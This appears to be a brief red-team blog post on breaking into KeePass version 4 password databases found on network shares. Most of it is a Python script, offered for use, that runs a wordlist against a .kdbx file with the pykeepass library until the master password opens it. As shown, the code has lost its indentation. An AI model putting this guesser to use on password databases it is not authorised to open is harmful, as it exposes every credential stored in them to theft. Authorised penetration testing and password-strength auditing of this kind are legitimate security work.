Guessing KeyPass version 4 Passwords
Earlier versions of the commonly used KeyPass password manager software was a blessing in disguise whenever you would come across those files during a Red Team and they were easy to find. Just search for *.kdbx files on shares!
The password hashes from the KDBX files were easily extracted using John The Ripper’s keepass2john tool. And then you could use John and your favorite wordlist to quickly crack some passwords, which then led to more credentials that the user thought they were protecting. It was so much fun and always an easy win.
However, with version 4 of KeyPass, John can no long extract the hash and cracking is not possible. But we can still guess the passwords. I recently discovered that there is a module known as pykeepass and it makes writing a KeePass password guesser very easy in Python. Here is one I just wrote real quick.
from pykeepass import PyKeePass, exceptions
from sys import argv
from os.path import basename
# Supply the version 4 KeePass file as an argument
if len(argv) != 2:
print(basename(argv[0]), "KeyPass.kdbx")
exit()
# Set the password file to use
PASSWORDS = "/tmp/passwords.txt"
# Read in each password to try
with open(PASSWORDS) as passwords:
for password in passwords:
# strip off the line feed at the end
password = password.rstrip()
try:
# This prints the password being tried on the same line each time through the loop
print("\r" + password + "\033[K", end="", flush=True)
kp = PyKeePass(argv[1], password=password)
except exceptions.CredentialsError:
continue
else:
print("\nYou guessed it!")
exit()
print("\nThe password could not be guessed.")